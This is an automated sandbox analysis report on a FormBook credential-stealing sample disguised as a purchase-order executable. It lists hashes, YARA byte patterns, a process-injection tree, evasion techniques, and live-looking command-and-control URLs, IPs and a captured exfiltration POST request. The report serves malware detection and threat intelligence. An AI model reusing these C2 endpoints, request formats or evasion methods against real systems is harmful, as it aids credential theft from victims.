Windows Analysis Report
Purchase Order_20240528.exe

Overview

General Information

Sample name: Purchase Order_20240528.exe
Analysis ID: 1448264
MD5: b6422c6c56cdab2a43415fdcceeaf3e6
SHA1: e05e478ce595c575d20f26b9cecc027068af5cd4
SHA256: 91c657cef25403ba946ecfe02fa69010169e8ab2515d3a1608b405ac3d12c1cd
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses nslookup.exe to query domains
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Purchase Order_20240528.exe (PID: 1764 cmdline: "C:\Users\user\Desktop\Purchase Order_20240528.exe" MD5: B6422C6C56CDAB2A43415FDCCEEAF3E6)
    • Purchase Order_20240528.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\Purchase Order_20240528.exe" MD5: B6422C6C56CDAB2A43415FDCCEEAF3E6)
      • qFrNDyfVqdmmFLBeyXwBmuB.exe (PID: 3892 cmdline: "C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • nslookup.exe (PID: 6600 cmdline: "C:\Windows\SysWOW64\nslookup.exe" MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)
          • qFrNDyfVqdmmFLBeyXwBmuB.exe (PID: 1364 cmdline: "C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 644 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2a9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1406f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2d033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x166b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        No Sigma rule has matched

        AV Detection

        Source: http://www.vpachurch.org.uk/hx08/, Avira URL Cloud: Label: malware
        Source: http://www.ceo-retreats.co.uk/5s1a/, Avira URL Cloud: Label: malware
        Source: http://www.vpachurch.org.uk/hx08/?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0, Avira URL Cloud: Label: malware
        Source: http://www.ilodezu.com/07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ=, Avira URL Cloud: Label: malware
        Source: http://www.ceo-retreats.co.uk/5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0, Avira URL Cloud: Label: malware
        Source: vpachurch.org.uk, Virustotal: Detection: 8%
        Source: Purchase Order_20240528.exe, Virustotal: Detection: 41%
        Source: Purchase Order_20240528.exe, ReversingLabs: Detection: 26%
        Source: Yara match, File source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Submitted sample, Integrated Neural Analysis Model: Matched 100.0% probability
        Source: Purchase Order_20240528.exe, Joe Sandbox ML: detected
        Source: Purchase Order_20240528.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: Purchase Order_20240528.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: nslookup.pdb source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: nslookup.pdbGCTL source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2132913413.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2285918681.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Purchase Order_20240528.exe, Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp
        Source: C:\Windows\SysWOW64\nslookup.exe, Code function: 5_2_02A6BD30 FindFirstFileW,FindNextFileW,FindClose, 5_2_02A6BD30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe, Code function: 4x nop then jmp 06D16A72h, 0_2_06D16172
        Source: C:\Windows\SysWOW64\nslookup.exe, Code function: 4x nop then xor eax, eax, 5_2_02A597F0
        Source: C:\Windows\SysWOW64\nslookup.exe, Code function: 4x nop then pop edi, 5_2_02A622FB

        Networking

        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49712 -> 3.33.130.190:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49713 -> 3.33.130.190:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49717 -> 212.227.172.254:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49718 -> 212.227.172.254:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49721 -> 199.59.243.225:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49722 -> 199.59.243.225:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49725 -> 46.30.215.104:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49726 -> 46.30.215.104:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49729 -> 92.205.15.157:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49730 -> 92.205.15.157:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49733 -> 76.223.67.189:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49734 -> 76.223.67.189:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49737 -> 216.40.34.41:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49738 -> 216.40.34.41:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49741 -> 203.161.43.227:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49742 -> 203.161.43.227:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49745 -> 185.229.21.229:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49746 -> 185.229.21.229:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49749 -> 178.63.50.103:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49750 -> 178.63.50.103:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49753 -> 108.179.192.228:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49754 -> 108.179.192.228:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49757 -> 149.88.84.60:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49758 -> 149.88.84.60:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49761 -> 3.33.130.190:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49762 -> 3.33.130.190:80
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe, Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
        Source: Joe Sandbox View, IP Address: 76.223.67.189
        Source: Joe Sandbox View, ASN Name: AMAZON-02US
        Source: Joe Sandbox View, ASN Name: ONECOMDK
        Source: Joe Sandbox View, ASN Name: GD-EMEA-DC-SXB1DE
        Source: Joe Sandbox View, ASN Name: BODIS-NJUS
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic, DNS traffic detected: DNS query: www.ilodezu.com
        Source: global traffic, DNS traffic detected: DNS query: www.vpachurch.org.uk
        Source: global traffic, DNS traffic detected: DNS query: www.shopnaya.fr
        Source: global traffic, DNS traffic detected: DNS query: www.dolcegusto-quiz.fun
        Source: global traffic, DNS traffic detected: DNS query: www.etrading.cloud
        Source: global traffic, DNS traffic detected: DNS query: www.ceo-retreats.co.uk
        Source: global traffic, DNS traffic detected: DNS query: www.mavonorm-global.uk
        Source: global traffic, DNS traffic detected: DNS query: www.adhdphotography.com
        Source: global traffic, DNS traffic detected: DNS query: www.allgiftedmalaysia.com
        Source: global traffic, DNS traffic detected: DNS query: www.shortput.top
        Source: global traffic, DNS traffic detected: DNS query: www.cuddle-paws.co.uk
        Source: global traffic, DNS traffic detected: DNS query: www.home-stroi0m.ru
        Source: global traffic, DNS traffic detected: DNS query: www.betopfloor.com
        Source: global traffic, DNS traffic detected: DNS query: www.bade.ink
        Source: global traffic, DNS traffic detected: DNS query: www.futurereadyteaming.com
        Source: unknown HTTP traffic detected: POST /hx08/ HTTP/1.1 Host: www.vpachurch.org.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Origin: http://www.vpachurch.org.uk Referer: http://www.vpachurch.org.uk/hx08/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 28 May 2024 05:16:27 GMT Server: Apache Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 X-Onecom-Cluster-Name: X-Varnish: 247437343 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 28 May 2024 05:16:29 GMT Server: Apache Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 X-Onecom-Cluster-Name: X-Varnish: 275448000 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 28 May 2024 05:16:32 GMT Server: Apache Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 X-Onecom-Cluster-Name: X-Varnish: 229319986 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 28 May 2024 05:16:34 GMT Server: Apache Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 X-Onecom-Cluster-Name: X-Varnish: 273023697 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 28 May 2024 05:16:40 GMT Server: Apache X-Powered-By: PHP/8.1.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: br Content-Length: 10723 Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 28 May 2024 05:16:42 GMT Server: Apache X-Powered-By: PHP/8.1.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: br Content-Length: 10723 Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 28 May 2024 05:16:45 GMT Server: Apache X-Powered-By: PHP/8.1.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: br Content-Length: 10723 Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 72662986-fa05-4e92-a665-bfcf77779dda x-runtime: 0.029467 content-length: 18254 connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 238e2ff7-599a-4fd4-bb3d-a9cf08aa8df5 x-runtime: 0.056269 content-length: 18278 connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: a8a9b9cd-96f7-44b8-b236-0f9927f5c434 x-runtime: 0.033622 content-length: 19290 connection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:20 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 
74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:23 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 
74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 